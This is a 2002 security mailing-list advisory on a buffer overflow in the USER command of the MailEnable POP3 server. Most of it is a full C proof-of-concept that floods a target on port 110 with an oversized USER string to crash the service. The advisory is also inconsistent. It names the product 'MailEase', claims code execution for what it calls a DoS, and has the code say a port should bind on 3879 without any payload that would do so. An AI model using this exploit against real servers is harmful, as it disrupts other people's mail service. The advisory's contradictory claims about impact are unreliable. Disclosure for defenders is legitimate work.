[NT] MailEase POP3 Denial of Service

From: support@securiteam.com
Date: 11/21/02

  • Next message: support@securiteam.com: "[NEWS] iPlanet WebServer Vulnerable to Remote Root Compromise" 
    From: support@securiteam.com
To: list@securiteam.com
Date: 21 Nov 2002 12:21:24 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    Beyond Security would like to welcome Tiscali World Online
    to our service provider team.
    For more info on their service offering IP-Secure,
    please visit http://www.worldonline.co.za/services/work_ip.asp
    - - - - - - - - -

      MailEase POP3 Denial of Service
    ------------------------------------------------------------------------

    SUMMARY

     <http://www.mailenable.com/> MailEnable's Messaging Services Platform is
    a powerful and scalable hosted messaging platform for the Microsoft
    Windows platform. All the elements of a professional and high performance
    mail server have been integrated into MailEnable with all the difficult
    and tedious aspects removed.

    DETAILS

    A vulnerability in the USER allows remote attackers to execute arbitrary
    code.

    Exploit:
    USER Ax2009 will over write strcmp();

    Here's the code to hang the pop3 server:
    /*
    *
    * Written by redsand
    * <redsand@redsand.net>
    * Vuln. date found: November 18. 2002
    * Vulnerable: Windows 9x/NT/XP MailEnable POP Server Version 1.02
    *
    * Usage: ./mailenable-dos.1.3 <host> [port] [port] is optional. default is
    in the #define (port 110)
    * Need to Enable [offset] in final release.
    *
    * Proof of Concept code (PoC)
    *
    */

    #include <stdio.h>
    #include <stdlib.h>
    #include <errno.h>
    #include <string.h>
    #include <netdb.h>
    #include <sys/types.h>
    #include <netinet/in.h>
    #include <sys/socket.h>

    #define PORT 110

    char string[2010];
    char death[2500];
    char top[5], end[50];
    char tag[] = "::redsand.net::";

    int main(int argc, char *argv[]) {

      int sockfd, port, i;
      char buf[2500];
      struct hostent *ha;
      struct sockaddr_in sa;
      if (argc < 2 ) {
    printf("MailEnable POP Server Version 1.02 DoS\n:: redsand <at>
    redsand.net\r\nUsage: %s <host> <port>\n", argv[0]);
        exit(0);
      }
    if (argv[2]) {
    port = atoi(argv[2]);
    } else { port = PORT; }
    for( i = 0; i <2009; i++) {
    string[i] = 'A';
    }

    strcpy(top,"USER ");
    strcpy(end,tag);
    strcpy(death,top);
    strcat(death,string);
    strcat(death,end);

      if (!(ha = gethostbyname (argv[1])))
        perror ("gethostbyname");

      bzero (&sa, sizeof (sa));
      bcopy (ha->h_addr, (char *) &sa.sin_addr, ha->h_length);
      sa.sin_family = ha->h_addrtype;
      sa.sin_port = htons (port);

      if ((sockfd = socket (ha->h_addrtype, SOCK_STREAM, 0)) < 0) {
        perror ("socket");
        exit (1);
      }
     printf("MailEnable :: redsand <at> redsand.net\r\n+ connecting...\n");
      if (connect (sockfd, (struct sockaddr *) &sa, sizeof(sa)) < 0) {
        perror ("connect");
        exit (1);
      }
      printf("+ connected\n+ sending request to pop3 server\n");
      send(sockfd, death, sizeof(death), 0);
      // read(sockfd, buf, 2050, 0);
        close(sockfd);
      printf("+ finished\n");
      printf("\r\rIf exploit worked, then it should bind port on 3879\n");
    }

    /* redsand.net */

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:redsand@redsand.net> TJ
    Shelton.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

    Relevant Pages

    • Re: Angband with an accent: displaying extended characters
      ... I'd certainly expect a port to be possible, ... >> About platform stuff, the ideal situation would be if all platform dependent ... >> We are at least not in a hurry to remove support for RISCOS, ... future and which ones are lost cases that none care or compile for anymore. ...
      (rec.games.roguelike.angband)
    • [EXPL] TIBCO RendezVous Buffer Overflow (Exploit)
      ... TIB/Rendezvous Routing Communications Daemon (add router buffer ... TIB/Rendezvous Secure Daemon (port 7580) ... char *daemon; ... unsigned int DataOffset; ...
      (Securiteam)
    • Re: OpenVMS Itanium port progressing well says Gorham!
      ... do with the actual port itself. ... This was the BS spouted about OpenVMS when it apparently ... >>have been asking for a port to a low cost commodity platform ... >>100,000 for a 4 way server is commodity pricing. ...
      (comp.os.vms)
    • Re: Apple ahead of schedule
      ... They would find that preferable to making a port? ... platform or porting their product. ... efforts in the future to Windows, ...
      (comp.sys.mac.advocacy)
    • Re: Intel prepares to kill off the Pentium 4
      ... Roughly thirty-five million lines of OpenVMS source code and various and correspondingly giant build and test procedures, multiple languages, object code generation for x86-64, memory management for x86-64, linking for x86-64, signal handling, dealing with ACPI differences, dealing with I/O devices and interfaces, multiple third-party products. ... Be done with the port by lunchtime. ... The next step past this discussion: who would buy this OpenVMS x86-64 port, ... will Intel/Amd at one point start to "enforce" UEFI for the X86 platform? ...
      (comp.os.vms)